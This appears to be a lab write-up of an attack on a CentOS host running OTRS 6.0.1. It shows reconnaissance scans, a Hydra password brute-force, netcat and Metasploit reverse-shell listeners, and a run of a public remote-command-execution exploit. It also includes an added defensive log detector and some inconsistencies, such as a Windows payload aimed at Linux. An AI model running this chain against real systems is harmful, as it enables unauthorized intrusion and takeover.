┌──(kali㉿kali)-[~]
└─$ rhost='172.16.x.x'
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- $rhost
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p22,80,3306 -sC -sV -O $rhost
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 01:18 EDT
Nmap scan report for 172.16.x.x
Host is up (0.56s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey:
| 2048 05:9f:fe:b9:0b:0b:34:8a:09:b8:d7:62:61:ec:78:86 (RSA)
| 256 cd:2e:9a:2e:3c:f8:9d:e2:4f:0c:4d:db:d5:67:c5:27 (ECDSA)
|_ 256 63:8e:9d:28:91:a6:cc:8d:93:fd:69:72:fb:7b:e2:82 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 1 disallowed entry
|_*
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: Apache HTTP Server Test Page powered by CentOS
3306/tcp open mysql MariaDB (unauthorized)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:4.4
Aggressive OS guesses: Linux 4.4 (85%)
No exact OS matches for host (test conditions non-ideal).
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.34 seconds
┌──(kali㉿kali)-[~]
└─$ whatweb $rhost
http://172.16.x.x [403 Forbidden] Apache[2.4.6], Bootstrap, Country[RESERVED][ZZ], Email[webmaster@example.com], HTTPServer[CentOS][Apache/2.4.6 (CentOS)], IP[172.16.x.x], PoweredBy[Apache,CentOS], Title[Apache HTTP Server Test Page powered by CentOS]
Apache[2.4.6]
┌──(kali㉿kali)-[~]
└─$ nikto -host $rhost
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 172.16.x.x
+ Target Hostname: 172.16.x.x
+ Target Port: 80
+ Start Time: 2024-10-03 01:23:03 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /otrs/index.pl: Retrieved x-powered-by header: OTRS 6.0.1 (https://www.otrs.com/).
+ /otrs/index.pl: Uncommon header 'x-otrs-login' found, with contents: /otrs/index.pl?.
+ /otrs/index.pl: Cookie OTRSBrowserHasCookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /robots.txt: contains 3 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /otrs/installer.pl: Uncommon header 'content-disposition' found, with contents: filename="Installer.html".
+ 8912 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2024-10-03 02:03:15 (GMT-4) (2412 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Apache/2.4.6 (CentOS)
OTRS 6.0.1
┌──(kali㉿kali)-[~]
└─$ dirb http://$rhost
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Oct 3 01:26:51 2024
URL_BASE: http://172.16.x.x/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.16.x.x/ ----
+ http://172.16.x.x/cgi-bin/ (CODE:403|SIZE:210)
+ http://172.16.x.x/robots.txt (CODE:200|SIZE:85)
-----------------
END_TIME: Thu Oct 3 01:30:20 2024
DOWNLOADED: 4612 - FOUND: 2
robots.txt
┌──(kali㉿kali)-[~]
└─$ curl http://$rhost/robots.txt
User-agent: *
Allow: /
Allow: /otrs/index.pl
Disallow: *
Sitemap: /otrs/sitemap.xml
/otrs/index.pl
┌──(kali㉿kali)-[~]
└─$ curl $rhost/otrs/index.pl
<title>Login - OTRS 6</title>
curl confirms OTRS 6, but since the earlier nikto run (which took 40 minutes) had already identified OTRS 6.0.1, we search for that version directly.
┌──(kali㉿kali)-[~]
└─$ searchsploit OTRS 6.0.1
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
OTRS 5.0.x/6.0.x - Remote Command Execution (1) | perl/webapps/43853.txt
OTRS 6.0.1 - Remote Command Execution (2) | perl/webapps/49794.py
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results
perl/webapps/49794.py
OTRS 6.0.1 - Remote Command Execution (2)
# Tested on: OTRS 5.0.2/CentOS 7.2.1511
# CVE : CVE-2017-16921
baseuri = "http://10.1.1.1/index.pl";
username = "root@localhost";
password = "root";
revShellIp = "10.1.1.2";
revShellPort = 7007;
Confirming the root password
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-03 01:41:16
[ERROR] File for passwords not found: /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt
┌──(kali㉿kali)-[~]
└─$ sudo apt update
[sudo] password for kali:
┌──(kali㉿kali)-[~]
└─$ sudo apt install seclists
Installing:
seclists
Try again
┌──(kali㉿kali)-[~]
└─$ hydra -l root@localhot -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt $rhost http-post-form "/otrs/index.pl:Action=Login&RequestedURL=Action%3DAdmin&Lang=en&TimeZoneOffset=240&User=root%40localhost&Password=^PASS^:Login failed"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-03 02:32:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000000 login tries (l:1/p:1000000), ~62500 tries per task
[DATA] attacking http-post-form://172.16.x.x:80/otrs/index.pl:Action=Login&RequestedURL=Action%3DAdmin&Lang=en&TimeZoneOffset=240&User=root%40localhost&Password=^PASS^:Login failed
[80][http-post-form] host: 172.16.x.x login: root@localhot password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-03 02:32:21
As on Day 21, the working assumption is that the account is still the default one but the password has been changed; the message returned on a bad login, Login failed, is used as the failure string: Password=^PASS^:Login failed
In the end we found it.
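The defender's view of the Hydra run above, as an added example that is not from the original post: a rate-based detector over Apache access-log lines that flags the burst of POSTs to /otrs/index.pl a password-guessing run produces, and the 404 burst a directory brute-force like the dirb run produces. The log lines are constructed, and the window and thresholds are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '  # combined-log prefix
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return e

def max_in_window(times, window_s):
    """Largest number of events falling inside any window_s-second span."""
    times.sort()
    best, j = 0, 0
    for i, t in enumerate(times):
        while (t - times[j]).total_seconds() > window_s:
            j += 1
        best = max(best, i - j + 1)
    return best

def detect(lines, window_s=60, login_threshold=20, notfound_threshold=50):
    """Return sorted (ip, kind, count) alerts; thresholds are assumptions."""
    events = defaultdict(list)
    for e in filter(None, map(parse_line, lines)):
        path = e["path"].split("?", 1)[0]
        if e["method"] == "POST" and path == "/otrs/index.pl":
            events[(e["ip"], "otrs-login-burst")].append(e["ts"])
        elif e["status"] == "404":
            events[(e["ip"], "forced-browsing")].append(e["ts"])
    alerts = []
    for (ip, kind), times in events.items():
        thr = login_threshold if kind == "otrs-login-burst" else notfound_threshold
        n = max_in_window(times, window_s)
        if n >= thr:
            alerts.append((ip, kind, n))
    return sorted(alerts)

def sample_log():
    """Constructed sample: 25 login POSTs from one client in 13 s, plus a normal user."""
    fmt = '{ip} - - [03/Oct/2024:02:32:{s:02d} -0400] "{req} HTTP/1.1" {st} 512 "-" "Mozilla/5.0"'
    lines = [fmt.format(ip="172.16.0.99", s=8 + i // 2, req="POST /otrs/index.pl", st=200)
             for i in range(25)]
    lines.append(fmt.format(ip="172.16.0.50", s=1, req="GET /otrs/index.pl", st=200))
    lines.append(fmt.format(ip="172.16.0.50", s=3, req="GET /favicon.ico", st=404))
    return lines
```

Run detect() over the real access_log (one line per entry); the Hydra run above made far more than 20 POSTs to the login action inside a minute, so it trips the otrs-login-burst rule even at a much higher threshold.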
Listening
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 443
listening on [any] 443 ...
┌──(kali㉿kali)-[~]
└─$ msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.200.3
LHOST => 192.168.200.3
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.200.3:443
After changing the parameters, the handler is listening for the shell.
┌──(kali㉿kali)-[~]
└─$ python3 49794.py
[+] Retrieving auth token...
[+] Successfully logged in:
OTRSAgentInterface : 9S1W9EzotkTaCoN1a6ADr7GPWdDNukpC
[+] Grabbing challenge token from PGP panel...
[+]
[+] Enabling PGP keys in config, and setting our malicious command
[+] Now attempting to trigger the command. If this hangs, it likely means the reverse shell started.
[+] Exploit complete, check your listener for a shell